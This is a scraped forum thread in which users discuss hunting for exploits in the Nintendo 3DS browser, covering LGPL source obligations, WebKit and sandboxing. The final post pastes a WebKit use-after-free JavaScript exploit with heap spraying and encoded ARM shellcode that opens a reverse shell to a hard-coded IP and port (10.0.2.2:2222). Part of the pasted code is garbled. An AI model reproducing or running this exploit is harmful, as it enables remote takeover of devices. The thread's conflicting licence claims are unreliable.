So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
Hacking Internet Browser built on open source software.
- Thread starter LinkReincarnate
- Start date
- Views 5,763
- Replies 23
It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.
That is to say, the source code would be in one of the included libraries and not the actual browser itself.
That is to say, the source code would be in one of the included libraries and not the actual browser itself.
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
- Joined
- Jun 6, 2011
- Messages
- 138
- Trophies
- 1
- Age
- 34
- Location
- Melbourne, Florida!
- Website
- www.gofundme.com
- XP
- 239
- Country
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though
yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
LinkReincarnate said:
Sorry to be pessimistic, but:
1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...
2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...
3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.pachura said:
That's a completely wrong statement. Libraries licensed under LGPL does NOT require other thirds parties to hand over their code.LinkReincarnate said:
That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.
Source; http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html
Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
Toad King said:
That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.Harakiri23 said:
It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?pachura said:
Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.
function heap()
{
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length250){
// alert("freeze");
nodes[0].textContent}
}
}, 0);
}
[/p]
Similar threads
-
- Portal
(
